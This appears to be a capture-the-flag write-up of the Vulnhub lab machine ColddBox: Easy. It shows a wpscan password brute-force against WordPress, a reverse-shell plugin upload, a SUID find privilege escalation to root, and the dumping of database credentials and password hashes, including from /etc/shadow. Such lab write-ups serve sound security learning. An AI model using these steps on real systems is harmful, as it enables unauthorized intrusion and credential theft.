Vulnhub - COLDDBOX: EASY
Introduction
Welcome to ColddBox Easy, it is a Wordpress machine with an easy level of difficulty, highly recommended for beginners in the field, good luck! Please share your feedback: “https://twitter.com/C0ldd__”
This is ColddBox: Easy from vulnhub. Last one before bedtime - this will be brief.
Ports
This box just has HTTP on port 80 and SSH on a non-standard port: 4512. We won’t be needing it anyway.
Website
The website is running Wordpress, and wpscan finds several users. I run a password attack:
root@kali:/opt/vulnhub/coldbox# wpscan --url http://192.168.1.128 -U 'hugo,c0ldd,philip' -P /usr/share/seclists/Passwords/probable-v2-top12000.txt
And find the password for c0ldd
[!] Valid Combinations Found:
| Username: c0ldd, Password: 9876543210
I stop the scan at this point and login. c0ldd is the admin and we have an older version of Wordpress, so I upload a reverse shell as a plugin and get on the box.
Privesc
We’ve got find with the SUID bit set, so that’s our path to root.
GTFOBins says:
./find . -exec /bin/sh -p \; -quit
www-data@ColddBox-Easy:/var/www/html$ find . -exec /bin/sh -p \; -quit
find . -exec /bin/sh -p \; -quit
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=That was that.
Other stuff
I also found the database creds:
/var/www/html/wp-config.php:define(‘DB_PASSWORD’, ‘cybersecurity’);
/var/www/html/wp-config.php:define(‘DB_USER’, ‘c0ldd’);
So I logged in and grabbed the hashes:
www-data@ColddBox-Easy:/var/www/html$ mysql --host=localhost -u c0ldd -p
mysql --host=localhost -u c0ldd -p
Enter password: cybersecurity
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 13593
Server version: 10.0.38-MariaDB-0ubuntu0.16.04.1 Ubuntu 16.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| colddbox |
| information_schema |
+--------------------+
2 rows in set (0.00 sec)
MariaDB [(none)]> use colddbox;
use colddbox;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [colddbox]> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+----------------------+----------+---------------------+---------------------+-------------+--------------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+----------------------+----------+---------------------+---------------------+-------------+--------------------+
| 1 | c0ldd | $P$BJs9aAEh2WaBXC2zFhhoBrDUmN1g0i1 | c0ldd | c0ldd@localhost.com | | 2020-09-24 15:06:57 | | 0 | the cold in person |
| 2 | hugo | $P$B2512D1ABvEkkcFZ5lLilbqYFT1plC/ | hugo | hugo@localhost.com | | 2020-09-24 15:48:13 | | 0 | hugo |
| 4 | philip | $P$BXZ9bXCbA1JQuaCqOuuIiY4vyzjK/Y. | philip | philip@localhost.com | | 2020-10-19 17:38:25 | | 0 | philip |
+----+------------+------------------------------------+---------------+----------------------+----------+---------------------+---------------------+-------------+--------------------+
3 rows in set (0.00 sec)The hash for Hugo cracked easily but he’s not a system user so I logged into Wordpress, but there was nothing interesting there. The other one didn’t want to crack, so that was a dead end anyway.
c0ldd didn’t reuse his Wordpress password for his Linux account, so I couldn’t su to him. I grabbed his hash from /etc/shadow and it’s running in Hashcat but hasn’t broken yet … I’m off to bed :)